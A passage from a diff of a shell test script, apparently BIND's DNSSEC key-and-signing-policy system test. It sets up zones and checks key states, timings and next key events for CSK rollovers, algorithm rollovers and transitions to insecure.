+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the predecessor DS has been replaced with the
+# successor DS and enough time has passed such that the all validators that
+# have this DS RRset cached only know about the successor DS. This is the
+# registration delay plus the retire interval, which is the parent
+# propagation delay plus the DS TTL plus the retire-safety. For the
+# csk-roll2 policy this means: 1w + 1h + 1h = 170h = 612000 seconds.
+# However, 136800 seconds have passed already, so 478800 seconds left.
+check_next_key_event 475200
+
+#
+# Zone: step5.csk-roll2.autosign.
+#
+set_zone "step5.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) DNSKEY can be removed.
+set_keysigning "KEY1" "no"
+set_keystate "KEY1" "STATE_DNSKEY" "unretentive"
+set_keystate "KEY1" "STATE_KRRSIG" "unretentive"
+set_keystate "KEY1" "STATE_DS" "hidden"
+# The new CSK (KEY2) is now fully OMNIPRESENT.
+set_keystate "KEY2" "STATE_DS" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4634 hours ago (16682400 seconds).
+csk_rollover_predecessor_keytimes -16682400
+# - The new CSK was published 173 hours (622800 seconds) ago.
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" -622800
+published=$(key_get KEY2 PUBLISHED)
+set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}"
+set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the DNSKEY enters the HIDDEN state. This is the
+# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is:
+# 1h + 1h = 7200 seconds.
+check_next_key_event 7200
+
+#
+# Zone: step6.csk-roll2.autosign.
+#
+set_zone "step6.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) is now completely HIDDEN.
+set_keystate "KEY1" "STATE_DNSKEY" "hidden"
+set_keystate "KEY1" "STATE_KRRSIG" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4636 hours ago (16689600 seconds).
+csk_rollover_predecessor_keytimes -16689600
+# - The new CSK was published 175 hours (630000 seconds) ago.
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" -630000
+published=$(key_get KEY2 PUBLISHED)
+set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}"
+set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the new successor needs to be published.
+# This is the Lcsk, minus time passed since the key was published.
+# Lcsk: 186d (16070400 seconds)
+# Time passed: 175h (630000 seconds)
+check_next_key_event 15440400
+
+#
+# Zone: step7.csk-roll2.autosign.
+#
+set_zone "step7.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) could have been purged, but purge-keys is disabled.
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Test #2375: Scheduled rollovers are happening faster than they can finish
+#
+set_zone "three-is-a-crowd.kasp"
+set_policy "ksk-doubleksk" "3" "7200"
+set_server "ns3" "10.53.0.3"
+CDNSKEY="no"
+# These are the same time values as calculated for ksk-doubleksk.
+Lksk=5184000
+Lzsk=31536000
+IretKSK=180000
+IretZSK=867600
+# KSK (KEY1) is outgoing.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "${Lksk}"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+set_keystate "KEY1" "GOAL" "hidden"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "unretentive"
+# KSK (KEY2) is incoming.
+key_clear "KEY2"
+set_keyrole "KEY2" "ksk"
+set_keylifetime "KEY2" "${Lksk}"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "yes"
+set_zonesigning "KEY2" "no"
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY2" "STATE_DS" "rumoured"
+# We will introduce the third KSK shortly.
+key_clear "KEY3"
+# ZSK (KEY4).
+key_clear "KEY4"
+set_keyrole "KEY4" "zsk"
+set_keylifetime "KEY4" "${Lzsk}"
+set_keyalgorithm "KEY4" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY4" "no"
+set_zonesigning "KEY4" "yes"
+set_keystate "KEY4" "GOAL" "omnipresent"
+set_keystate "KEY4" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY4" "STATE_ZRRSIG" "omnipresent"
+# Run preliminary tests.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+# Roll over KEY2.
+# Set expected key lifetime, which is DNSKEY TTL plus the zone propagation delay,
+# plus the publish-safety: 7200s + 1h + 1d = 97200 seconds.
+set_keylifetime "KEY2" "97200"
+created=$(key_get KEY2 CREATED)
+rndc_rollover "$SERVER" "$DIR" $(key_get KEY2 ID) "${created}" "$ZONE"
+# Update expected number of keys and key states.
+set_keystate "KEY2" "GOAL" "hidden"
+set_policy "ksk-doubleksk" "4" "7200"
+CDNSKEY="no"
+# New KSK (KEY3) is introduced.
+set_keyrole "KEY3" "ksk"
+set_keylifetime "KEY3" "${Lksk}"
+set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY3" "yes"
+set_zonesigning "KEY3" "no"
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY3" "STATE_DS" "hidden"
+# Run tests again. We now expect four keys (3x KSK, 1x ZSK).
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+# Test dynamic zones that switch to inline-signing.
+set_zone "dynamic2inline.kasp"
+set_policy "default" "1" "3600"
+set_server "ns6" "10.53.0.6"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# The CSK is rumoured.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY1" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_ZRRSIG" "rumoured"
+set_keystate "KEY1" "STATE_DS" "hidden"
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Testing algorithm rollover.
+#
+Lksk=0
+Lzsk=0
+IretKSK=0
+IretZSK=0
+
+#
+# Zone: step1.algorithm-roll.kasp
+#
+set_zone "step1.algorithm-roll.kasp"
+set_policy "rsasha256" "2" "3600"
+set_server "ns6" "10.53.0.6"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "0"
+set_keyalgorithm "KEY2" "8" "RSASHA256" "2048"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# The KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# These keys are immediately published and activated.
+rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor keys need to be published.
+# Since the lifetime of the keys are unlimited, so default to loadkeys
+# interval.
+check_next_key_event 3600
+
+#
+# Zone: step1.csk-algorithm-roll.kasp
+#
+set_zone "step1.csk-algorithm-roll.kasp"
+set_policy "csk-algoroll" "1" "3600"
+set_server "ns6" "10.53.0.6"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "8" "RSASHA256" "2048"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+# The CSK (KEY1) starts in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# This key is immediately published and activated.
+Lcsk=0
+IretCSK=0
+csk_rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor keys need to be published.
+# Since the lifetime of the keys are unlimited, so default to loadkeys
+# interval.
+check_next_key_event 3600
+
+#
+# Testing going insecure.
+#
+
+#
+# Zone step1.going-insecure.kasp
+#
+set_zone "step1.going-insecure.kasp"
+set_policy "unsigning" "2" "7200"
+set_server "ns6" "10.53.0.6"
+
+# Policy parameters.
+# Lksk: 0
+# Lzsk: 60 days (5184000 seconds)
+# Iret(KSK): DS TTL (1d) + DprpP (1h) + retire-safety (1h)
+# Iret(KSK): 1d2h (93600 seconds)
+# Iret(ZSK): RRSIG TTL (1d) + Dprp (5m) + Dsgn (9d) + retire-safety (1h)
+# Iret(ZSK): 10d1h5m (867900 seconds)
+Lksk=0
+Lzsk=5184000
+IretKSK=93600
+IretZSK=867900
+
+init_migration_insecure() {
+ key_clear "KEY1"
+ set_keyrole "KEY1" "ksk"
+ set_keylifetime "KEY1" "${Lksk}"
+ set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+ set_keysigning "KEY1" "yes"
+ set_zonesigning "KEY1" "no"
+
+ set_keystate "KEY1" "GOAL" "omnipresent"
+ set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+ set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+ set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+ key_clear "KEY2"
+ set_keyrole "KEY2" "zsk"
+ set_keylifetime "KEY2" "${Lzsk}"
+ set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+ set_keysigning "KEY2" "no"
+ set_zonesigning "KEY2" "yes"
+
+ set_keystate "KEY2" "GOAL" "omnipresent"
+ set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+ set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+
+ key_clear "KEY3"
+ key_clear "KEY4"
+}
+init_migration_insecure
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# We have set the timing metadata to now - 10 days (864000 seconds).
+rollover_predecessor_keytimes -864000
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone step1.going-insecure-dynamic.kasp
+#
+
+set_zone "step1.going-insecure-dynamic.kasp"
+set_dynamic
+set_policy "unsigning" "2" "7200"
+set_server "ns6" "10.53.0.6"
+init_migration_insecure
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# We have set the timing metadata to now - 10 days (864000 seconds).
+rollover_predecessor_keytimes -864000
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Zone step1.going-straight-to-none.kasp
+#
+set_zone "step1.going-straight-to-none.kasp"
+set_policy "default" "1" "3600"
+set_server "ns6" "10.53.0.6"
+# Key properties.
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+# This policy only has one key.
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# The first key is immediately published and activated.
+created=$(key_get KEY1 CREATED)
+set_keytime "KEY1" "PUBLISHED" "${created}"
+set_keytime "KEY1" "ACTIVE" "${created}"
+set_keytime "KEY1" "SYNCPUBLISH" "${created}"
+# Key lifetime is unlimited, so not setting RETIRED and REMOVED.
+check_keytimes
+
+check_apex
+check_subdomain
+dnssec_verify
+
+# Reconfig dnssec-policy (triggering algorithm roll and other dnssec-policy
+# changes).
+echo_i "reconfig dnssec-policy to trigger algorithm rollover"
+copy_setports ns6/named2.conf.in ns6/named.conf
+rndc_reconfig ns6 10.53.0.6
+
+# Calculate time passed to correctly check for next key events.
+now="$(TZ=UTC date +%s)"
+time_passed=$((now-start_time))
+echo_i "${time_passed} seconds passed between start of tests and reconfig"
+
+# Wait until we have seen "zone_rekey done:" message for this key.
+_wait_for_done_signing() {
+ _zone=$1
+
+ _ksk=$(key_get $2 KSK)
+ _zsk=$(key_get $2 ZSK)
+ if [ "$_ksk" = "yes" ]; then
+ _role="KSK"
+ _expect_type=EXPECT_KRRSIG
+ elif [ "$_zsk" = "yes" ]; then
+ _role="ZSK"
+ _expect_type=EXPECT_ZRRSIG
+ fi
+
+ if [ "$(key_get ${2} $_expect_type)" = "yes" ] && [ "$(key_get $2 $_role)" = "yes" ]; then
+ _keyid=$(key_get $2 ID)
+ _keyalg=$(key_get $2 ALG_STR)
+ echo_i "wait for zone ${_zone} is done signing with $2 ${_zone}/${_keyalg}/${_keyid}"
+ grep "zone_rekey done: key ${_keyid}/${_keyalg}" "${DIR}/named.run" > /dev/null || return 1
+ fi
+
+ return 0
+}
+
+wait_for_done_signing() {
+ n=$((n+1))
+ echo_i "wait for zone ${ZONE} is done signing ($n)"
+ ret=0
+
+ retry_quiet 30 _wait_for_done_signing ${ZONE} KEY1 || ret=1
+ retry_quiet 30 _wait_for_done_signing ${ZONE} KEY2 || ret=1
+ retry_quiet 30 _wait_for_done_signing ${ZONE} KEY3 || ret=1
+ retry_quiet 30 _wait_for_done_signing ${ZONE} KEY4 || ret=1
+
+ test "$ret" -eq 0 || echo_i "failed"
+ status=$((status+ret))
+}
+
+# Test dynamic zones that switch to inline-signing.
+set_zone "dynamic2inline.kasp"
+set_policy "default" "1" "3600"
+set_server "ns6" "10.53.0.6"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "0"
+set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# The CSK is rumoured.
+set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "rumoured" +set_keystate "KEY1" "STATE_KRRSIG" "rumoured" +set_keystate "KEY1" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY1" "STATE_DS" "hidden" +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing going insecure. +# + +# +# Zone: step1.going-insecure.kasp +# +set_zone "step1.going-insecure.kasp" +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" +# Expect a CDS/CDNSKEY Delete Record. +set_cdsdelete + +# Key goal states should be HIDDEN. +init_migration_insecure +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "hidden" +# The DS may be removed if we are going insecure. +set_keystate "KEY1" "STATE_DS" "unretentive" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Tell named that the DS has been removed. +rndc_checkds "$SERVER" "$DIR" "KEY1" "now" "withdrawn" "$ZONE" +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DS becomes HIDDEN. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 1h + 1d = 26h = 93600 seconds. +check_next_key_event 93600 + +# +# Zone: step2.going-insecure.kasp +# +set_zone "step2.going-insecure.kasp" +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" + +# The DS is long enough removed from the zone to be considered HIDDEN. +# This means the DNSKEY and the KSK signatures can be removed. 
+set_keystate "KEY1" "STATE_DS" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keysigning "KEY1" "no" + +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +set_zonesigning "KEY2" "no" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# Next key event is when the DNSKEY becomes HIDDEN. This happens after the +# propagation delay, plus DNSKEY TTL: +# 5m + 2h = 125m = 7500 seconds. +check_next_key_event 7500 + +# +# Zone: step1.going-insecure-dynamic.kasp +# +set_zone "step1.going-insecure-dynamic.kasp" +set_dynamic +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" +# Expect a CDS/CDNSKEY Delete Record. +set_cdsdelete + +# Key goal states should be HIDDEN. +init_migration_insecure +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "hidden" +# The DS may be removed if we are going insecure. +set_keystate "KEY1" "STATE_DS" "unretentive" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Tell named that the DS has been removed. +rndc_checkds "$SERVER" "$DIR" "KEY1" "now" "withdrawn" "$ZONE" +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DS becomes HIDDEN. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 1h + 1d = 26h = 93600 seconds. +check_next_key_event 93600 + +# +# Zone: step2.going-insecure-dynamic.kasp +# +set_zone "step2.going-insecure-dynamic.kasp" +set_dynamic +set_policy "insecure" "2" "7200" +set_server "ns6" "10.53.0.6" + +# The DS is long enough removed from the zone to be considered HIDDEN. +# This means the DNSKEY and the KSK signatures can be removed. 
+set_keystate "KEY1" "STATE_DS" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keysigning "KEY1" "no" + +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +set_zonesigning "KEY2" "no" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain + +# Next key event is when the DNSKEY becomes HIDDEN. This happens after the +# propagation delay, plus DNSKEY TTL: +# 5m + 2h = 125m = 7500 seconds. +check_next_key_event 7500 + +# +# Zone: step1.going-straight-to-none.kasp +# +set_zone "step1.going-straight-to-none.kasp" +set_policy "none" "1" "3600" +set_server "ns6" "10.53.0.6" + +# The zone will go bogus after signatures expire, but remains validly signed for now. + +# Key properties. +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# DNSKEY, RRSIG (ksk), RRSIG (zsk) are published. DS needs to wait. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# This policy only has one key. +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +dnssec_verify + +# +# Testing KSK/ZSK algorithm rollover. +# + +# Policy parameters. +# Lksk: unlimited +# Lzsk: unlimited +Lksk=0 +Lzsk=0 + +# +# Zone: step1.algorithm-roll.kasp +# +set_zone "step1.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# Old RSASHA1 keys. 
+key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "8" "RSASHA256" "2048" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# New ECDSAP256SHA256 keys. +key_clear "KEY3" +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "0" +set_keyalgorithm "KEY3" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" + +key_clear "KEY4" +set_keyrole "KEY4" "zsk" +set_keylifetime "KEY4" "0" +set_keyalgorithm "KEY4" "13" "ECDSAP256SHA256" "256" +set_keysigning "KEY4" "no" +set_zonesigning "KEY4" "yes" +# The RSAHSHA1 keys are outroducing. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# The ECDSAP256SHA256 keys are introducing. +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" +set_keystate "KEY4" "GOAL" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "rumoured" +set_keystate "KEY4" "STATE_ZRRSIG" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys are published and activated. +rollover_predecessor_keytimes 0 +# - KSK must be retired since it no longer matches the policy. 
+keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretKSK = TTLds + DprpP + retire-safety +# TTLds: 2h (7200 seconds) +# DprpP: 1h (3600 seconds) +# retire-safety: 2h (7200 seconds) +# IretKSK: 5h (18000 seconds) +IretKSK=18000 +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +keyfile=$(key_get KEY2 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.zsk +retired=$(awk '{print $3}' < retired.test${n}.zsk) +set_keytime "KEY2" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety +# TTLsig: 6h (21600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 25d (2160000 seconds) +# retire-safety: 2h (7200 seconds) +# IretZSK: 25d9h (2192400 seconds) +IretZSK=2192400 +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new KSK is published and activated. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +set_keytime "KEY3" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 6h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 8h (28800 seconds) +Ipub=28800 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${Ipub}" +# - The new ZSK is published and activated. +created=$(key_get KEY4 CREATED) +set_keytime "KEY4" "PUBLISHED" "${created}" +set_keytime "KEY4" "ACTIVE" "${created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the ecdsa256 keys have been propagated. +# This is the DNSKEY TTL plus publish safety plus zone propagation delay: +# 3 times an hour: 10800 seconds. 
+check_next_key_event 10800 + +# +# Zone: step2.algorithm-roll.kasp +# +set_zone "step2.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 keys are outroducing, but need to stay present until the new +# algorithm chain of trust has been established. Thus the properties, timings +# and states of the KEY1 and KEY2 are the same as above. + +# The ECDSAP256SHA256 keys are introducing. The DNSKEY RRset is omnipresent, +# but the zone signatures are not. +set_keystate "KEY3" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY3" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY4" "STATE_DNSKEY" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated three hours ago (10800 seconds). +rollover_predecessor_keytimes -10800 +# - KSK must be retired since it no longer matches the policy. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "RETIRED" "${created}" +set_addkeytime "KEY1" "REMOVED" "${created}" "${IretKSK}" +# - ZSK must be retired since it no longer matches the policy. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "RETIRED" "${created}" +set_addkeytime "KEY2" "REMOVED" "${created}" "${IretZSK}" +# - The new keys are published 3 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY3" "ACTIVE" "${created}" -10800 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${Ipub}" + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY4" "ACTIVE" "${created}" -10800 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when all zone signatures are signed with the new +# algorithm. 
This is the max-zone-ttl plus zone propagation delay +# plus retire safety: 6h + 1h + 2h. But three hours have already passed +# (the time it took to make the DNSKEY omnipresent), so the next event +# should be scheduled in 6 hour: 21600 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((21600-time_passed)) +check_next_key_event $next_time + +# +# Zone: step3.algorithm-roll.kasp +# +set_zone "step3.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The ECDSAP256SHA256 keys are introducing. +set_keystate "KEY4" "STATE_ZRRSIG" "omnipresent" +# The DS can be swapped. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY3" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY3 + +# Set expected key times: +# - The old keys were activated 9 hours ago 